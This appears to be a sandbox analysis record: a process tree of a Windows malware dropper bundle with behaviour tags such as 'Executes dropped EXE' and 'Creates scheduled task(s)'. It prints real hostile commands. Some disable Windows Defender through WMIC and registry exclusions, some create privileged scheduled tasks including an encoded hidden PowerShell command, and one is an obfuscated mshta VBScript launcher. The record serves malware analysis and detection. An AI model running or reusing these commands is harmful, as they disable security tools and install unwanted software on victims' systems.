C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Users\Admin\AppData\Local\Temp\01-bd019-b4b-573a8-587d4e69b2be0\Jyjunanuvy.exe"C:\Users\Admin\AppData\Local\Temp\01-bd019-b4b-573a8-587d4e69b2be0\Jyjunanuvy.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kkvol0fo.wye\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\kkvol0fo.wye\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kkvol0fo.wye\GcleanerEU.exe /eufive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 30411⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qjxyn0ie.wbt\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\qjxyn0ie.wbt\installer.exeC:\Users\Admin\AppData\Local\Temp\qjxyn0ie.wbt\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\qjxyn0ie.wbt\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\qjxyn0ie.wbt\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631870605 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kdlxf5tf.uni\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\kdlxf5tf.uni\anyname.exeC:\Users\Admin\AppData\Local\Temp\kdlxf5tf.uni\anyname.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3qqqx40h.mcj\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\3qqqx40h.mcj\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\3qqqx40h.mcj\gcleaner.exe /mixfive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 556 -s 30411⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\papzes35.ayt\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri007b1b030a1a32.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri007b1b030a1a32.exeFri007b1b030a1a32.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 3126⤵
- Drops file in Windows directory
- Program crash
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri000fb585dc0ad7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri000fb585dc0ad7.exeFri000fb585dc0ad7.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00515c9ed9622f.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri00515c9ed9622f.exeFri00515c9ed9622f.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\uGAIOsy0cyBMLy0x8qQhbIb9.exe"C:\Users\Admin\Documents\uGAIOsy0cyBMLy0x8qQhbIb9.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Y4E4zZMnDLS2jIMVnr7Dq9f1.exe"C:\Users\Admin\Documents\Y4E4zZMnDLS2jIMVnr7Dq9f1.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
-
C:\Users\Admin\Documents\7WTxqNFpB1liTiZex_hE7hPk.exe"C:\Users\Admin\Documents\7WTxqNFpB1liTiZex_hE7hPk.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\62WXs31DiU_lPqVBteJRXwxj.exe"C:\Users\Admin\Documents\62WXs31DiU_lPqVBteJRXwxj.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSEC01.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSEE33.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHcOQiMKC" /SC once /ST 01:13:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEwGusBEGbIeKSSfjR" /SC once /ST 02:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\LzIDqil.exe\" XY /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Users\Admin\Documents\0_5EyHbh3gn9wu3DDMKVbe2x.exe"C:\Users\Admin\Documents\0_5EyHbh3gn9wu3DDMKVbe2x.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT: closE ( creatEOBJeCT( "WscriPT.shEll"). RUN ("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\Documents\0_5EyHbh3gn9wu3DDMKVbe2x.exe"" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF """" =="""" for %q In (""C:\Users\Admin\Documents\0_5EyHbh3gn9wu3DDMKVbe2x.exe"" ) do taskkill -iM ""%~nxq"" /f " , 0 , TrUe ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\Documents\0_5EyHbh3gn9wu3DDMKVbe2x.exe" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "" =="" for %q In ("C:\Users\Admin\Documents\0_5EyHbh3gn9wu3DDMKVbe2x.exe" ) do taskkill -iM "%~nxq" /f10⤵
-
C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXeroBCqJOQYC.eXe -P0_6X2fnCLFU6G11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT: closE ( creatEOBJeCT( "WscriPT.shEll"). RUN ("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF ""-P0_6X2fnCLFU6G"" =="""" for %q In (""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" ) do taskkill -iM ""%~nxq"" /f " , 0 , TrUe ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "-P0_6X2fnCLFU6G" =="" for %q In ("C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" ) do taskkill -iM "%~nxq" /f13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\LcGE3.T_v,mPHYMXZs12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "0_5EyHbh3gn9wu3DDMKVbe2x.exe" /f11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\IdTIuEvxp8vtL3Y6tiyTVW50.exe"C:\Users\Admin\Documents\IdTIuEvxp8vtL3Y6tiyTVW50.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 2529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\9h0juX45eflO0kUjSWERttjq.exe"C:\Users\Admin\Documents\9h0juX45eflO0kUjSWERttjq.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 3089⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\rodN7rVXJUbtdy2Ers_haaxl.exe"C:\Users\Admin\Documents\rodN7rVXJUbtdy2Ers_haaxl.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 3089⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\qeVAaKPbnGtNnwYgMKjlCI_r.exe"C:\Users\Admin\Documents\qeVAaKPbnGtNnwYgMKjlCI_r.exe"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\Documents\aSh6oiR8qhgESodEwg1co944.exe"C:\Users\Admin\Documents\aSh6oiR8qhgESodEwg1co944.exe"8⤵
-
C:\Users\Admin\Documents\2f2AnaU5O3iDx3nMNnZpwE9j.exe"C:\Users\Admin\Documents\2f2AnaU5O3iDx3nMNnZpwE9j.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KR2IE.tmp\2f2AnaU5O3iDx3nMNnZpwE9j.tmp"C:\Users\Admin\AppData\Local\Temp\is-KR2IE.tmp\2f2AnaU5O3iDx3nMNnZpwE9j.tmp" /SL5="$103AC,506127,422400,C:\Users\Admin\Documents\2f2AnaU5O3iDx3nMNnZpwE9j.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-TKSKR.tmp\Chmenka.exe"C:\Users\Admin\AppData\Local\Temp\is-TKSKR.tmp\Chmenka.exe" /S /UID=12410⤵
-
C:\Program Files\Internet Explorer\NPIWBOIADZ\IDownload.exe"C:\Program Files\Internet Explorer\NPIWBOIADZ\IDownload.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ICQO4.tmp\IDownload.tmp"C:\Users\Admin\AppData\Local\Temp\is-ICQO4.tmp\IDownload.tmp" /SL5="$2030C,994212,425984,C:\Program Files\Internet Explorer\NPIWBOIADZ\IDownload.exe" /VERYSILENT12⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\IDownload\IDownload.App.exe"C:\Program Files (x86)\IDownload\IDownload.App.exe" -silent -desktopShortcut -programMenu13⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c-hsfzrm.cmdline"14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1CB2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1CB1.tmp"15⤵
-
C:\Users\Admin\AppData\Local\Temp\5d-78666-12f-0f585-9ca8525af83a1\Winaegecaede.exe"C:\Users\Admin\AppData\Local\Temp\5d-78666-12f-0f585-9ca8525af83a1\Winaegecaede.exe"11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
